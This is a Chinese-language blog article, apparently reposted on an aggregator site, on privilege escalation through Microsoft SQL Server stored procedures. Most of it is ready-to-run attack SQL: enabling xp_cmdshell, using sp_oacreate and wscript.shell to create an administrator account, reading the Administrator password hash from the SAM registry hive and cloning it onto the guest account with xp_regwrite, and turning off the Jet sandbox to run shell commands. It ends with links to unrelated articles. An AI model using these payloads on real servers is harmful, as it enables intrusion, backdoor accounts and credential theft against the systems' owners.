SqlServer常见攻击手法

这篇具有很好参考价值的文章主要介绍了SqlServer常见攻击手法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一些基础:

Mssql是什么:

mssql的英文全称是Microsoft SQL Server,一般简称MS-SQL或SQL Server;它是指微软的SQLServer数据库服务器,是一个关系型数据库管理系统。

mssql的用户权限
Mssql数据库是可以选择以windows用户密码进行登录的
SqlServer常见攻击手法
数据库角色的成员可以分为如下几类:

Windows用户组或用户账户
SQL Server登录
其他角色

说 明
sysadmin 执行SQL Server中的任何动作
serveradmin 配置服务器设置
setupadmin 安装复制和管理扩展过程
securityadmin 管理登录和CREATE DATABASE的权限以及阅读审计
processadmin 管理SQL Server进程
dbcreator 创建和修改数据库diskadmin 管理磁盘文件

Sa用户

sa用户是系统管理员的登录。Sa用户具有所有可能的关于系统管理工作的权限。在SQL Server 2005中,sa登录保持了向后兼容性。sa登录永远是固定服务器角色syadmin中的成员,并且不能从该角色中删除。

Mssql端口:1433
储存过程:
存储过程 Procedure 是一组为了完成特定功能的 SQL 语句集合,经编译后存储在数据库中,用户通过指定存储过程的名称并给出参数来执行。
存储过程中可以包含逻辑控制语句和数据操纵语句,它可以接受参数、输出参数、返回单个或多个结果集以及返回值。

Sqlserver的提权主要依赖其的储存过程

储存过程主要分为三类:
1系统存储过程主要存储在master数据库中,以sp_为前缀,在任何数据库中都可以调用,在调用的时候不必在存储过程前加上数据库名;
2扩展存储过程则是对动态链接库(DLL)函数的调用,主要是用于客户端与服务器端或客户端之间进行通信的,以xp_为前缀,使用方法与系统存储过程类似;
3用户定义的存储过程是SQLServer的使用者编写的存储过程。

Sqlserver的权限:
Sqlserver在windows服务中的权限是不小的,在Windows server类的操作系统上,默认具有system权限,所以我们才会通过Sqlserver执行命令,来进行提权操作

xp_cmd提权:

xp_cmdshell
它是可以用来执行系统命令的,但该组件默认是关闭的。因此需要把它打开。xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它
Exec:执行存储过程:如 EXEC SP_XXX
Econfigure:更新保存配置
sp_configure储存过程可显示或更改当前服务器的全局配置设置

开启xp_cmd扩展功能:
use master;
exec sp_configure ‘show advanced options’,1;
reconfigure;
exec sp_configure ‘xp_cmdshell’,1;
reconfigure;

SqlServer常见攻击手法
SqlServer常见攻击手法

如果xp_cmdshell被删除,上传xplog70.dll可恢复:
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, C:\xxxx\xplog70.dll

sp_oacreate提权:

spoacreate是一个非常危险的存储过程可以删除、复制、移动文件 还能配合spoamethod 来写文件执行cmd,在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权

启用sp_oacreate:
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

SqlServer常见攻击手法

执行命令:
declare @shell int;
exec sp_oacreate ‘wscript.shell’,@shell output;
exec sp_oamethod @shell,‘run’,null,‘c:\windows\system32\cmd.exe /c net user test test /add’;
exec sp_oamethod @shell,‘run’,null,‘c:\windows\system32\cmd.exe /c net localgroup administrators test /add’

SqlServer常见攻击手法
SqlServer常见攻击手法

xp_regread 与 xp_regwrite提权:

xp_regread 与 xp_regwrite是可以直接访问我们的注册表的,(注册表是windows系统中的一个重要的数据库“注册表即Registry是Windows系统中的一个重要的数据库,用于存储系统和应用程序的设置信息;其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的运行,从而在整个系统中起着核心作用。 )这样的话我们就可以通过修改注册表,来对目标机器的账户进行克隆。

Administrator密码:
SqlServer常见攻击手法
获取administrator的加密密码:
xp_regread ‘HKEY_LOCAL_MACHINE’,‘SAM\SAM\Domains\Account\Users\000001F4’,‘F’;

SqlServer常见攻击手法
将administrator用户的配置给gu覆盖到guest账号: xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SAM\SAM\Domains\Account\Users\000001F5’,‘F’,‘reg_binary’,0x02000100000000007534DD020BBBD00100000000000000008F0DDDB07DD3D80100000000000000000000000000000000F401000001020000110200000000000000000100010000000000000000000000;

SqlServer常见攻击手法

沙盒提权:

1,access可以调用VBS的函数,以System权限执行任意命令
2,Access执行这个命令是有条件的,需要一个开关被打开
3,这个开关在注册表里
4,SA是有权限写注册表的
5,用SA写注册表的权限打开那个开关
6,调用Access里的执行命令方法,以system权限执行任意命令执行SQL命令,执行了以下命令

Payload:
激活沙盒模式1:
exec master…xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,0;–

激活沙盒模式2:
exec master…xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Wow6432Node\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,0;

执行命令:
select * From OpenRowSet(‘Microsoft.Jet.OLEDB.4.0’,‘;Database=c:\windows\system32\ias\ias.mdb’,‘select shell(“net user >c:\1.txt ")');文章来源地址https://www.toymoban.com/news/detail-446780.html

到了这里,关于SqlServer常见攻击手法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Could not find artifact com.microsoft.sqlserver:mssql-jdbc:pom报错原因

    在maven的pom.xml文件中添加 更新依赖后报错: Cannot resolve Failure to transfer com.microsoft.sqlserver:mssql-jdbc:pom:8.1.1.jre8 from https://repo.maven.apache.org/maven2 was cached in the local repository, resolution will not be reattempted until the update interval of central has elapsed or updates are forced. Original error: Could not trans

    2024年02月02日
    浏览(43)
  • 通付盾Web3专题 | SharkTeam:起底朝鲜APT组织Lazarus Group,攻击手法及洗钱模式

    国家级APT(Advanced Persistent Threat,高级持续性威胁)组织是有国家背景支持的顶尖黑客团伙,专门针对特定目标进行长期的持续性网络攻击。朝鲜APT组织Lazarus Group就是非常活跃的一个APT团伙,其攻击目的主要以窃取资金为主,堪称全球金融机构的最大威胁,近年来多起加密货

    2024年02月02日
    浏览(56)
  • PWN学习之格式化字符串及CTF常见利用手法

    格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。 格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中  printf 、 sprintf 、 fprintf  等函数用于将数据格式化为字符串并进行输出

    2024年02月19日
    浏览(41)
  • 【ASP.NET Core 基础知识】--安全性--防范常见攻击

    在现实网络中即存在着安全的流量,又存在着不安全的流量在,这些不安全的流量常常会对我们的网站服务造成威胁,严重的甚至会泄露用户的隐私信息。这篇文章我们通过对常见的网络攻击 跨站脚本攻击 、 跨站请求伪造(CSRF) 、 SQL注入 、 敏感数据泄露 、 身份验证与授权

    2024年02月20日
    浏览(59)
  • MSSQL数据库基础

    MSSQL中自带数据库信息 库名 功能 Master 系统控制数据库 Model 模板数据库,数据库时建立所有数据库的模板。 Tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 Msdb 主要为用户使用,记录着计划信息、事件处理信息、数据备份、警告以及异常信息 MSSQL

    2024年02月12日
    浏览(46)
  • SqlServer中常用的一些操作语句

    我们在维护数据库数据的时候,通常会用到各种SQL语句对数据进行操作或者维护,如:查看某个数据库中有哪些用户数据表、每个数据表中总共有多少条数据…… SqlServer官方地址:https://learn.microsoft.com/zh-cn/sql 我们在维护数据库数据的时候,通常会用到各种SQL语句对数据进行

    2024年02月05日
    浏览(38)
  • Java接入sqlserver的一些坑点记录

    1.Java对应sqlserver的jdbc版本 jdbc对应的maven版本:网上搜索出来的资料有两种,一种是比较老版本的 这个版本我去maven的主仓库查了下,更新时间是2016年3月份,所以最好就别用这个老版本的包了。 推荐使用 :另外一种是船新版本的driver 2.Java对应sqlserver驱动名称 驱动名称: 发

    2024年02月08日
    浏览(37)
  • Sqlserver 设置sa用户及常见问题

    1.设置sa用户 windows验证登录之后 选择【安全性】,勾选【SQL Server 和 Windows身份验证模式】,点击【确定】。 安全性-》登录名-》sa 右键属性 设置密码 【强制实施密码策略】可勾选可不勾选 并且在状态中设置已启用   2. 错误233 已成功与服务器建立连接,但是在登录过程中

    2024年02月12日
    浏览(40)
  • 什么是arp攻击?常见arp攻击有哪些?

    假设局域网中有A、B、C三台计算机,A的IP地址是:192.168.1.100,MAC地址是:1A-2A-3A-4A-5A-6A;B的IP地址是:192.168.1.200,MAC地址是:1B-2B-3B-4B-5B-6B;C的IP地址是:192.168.1.250,MAC地址是:1C-2C-3C-4C-5C-6C. ARP正常工作 现在A要和B通信,A首先会发出一个ARP广播数据抱(即向192.168.1.0-192.168.

    2024年02月08日
    浏览(39)
  • 常见的AI安全风险(数据投毒、后门攻击、对抗样本攻击、模型窃取攻击等)

    数据投毒是一种通过在 训练数据 中植入恶意样本或修改数据以欺骗机器学习模型的方法。这种攻击旨在使模型 在未来的预测或决策中 产生错误结果。攻击者可能会植入具有误导性标签或特征的数据,以扭曲模型的学习过程,导致模型偏离真实数据的表征。数据投毒攻击可能

    2024年02月03日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包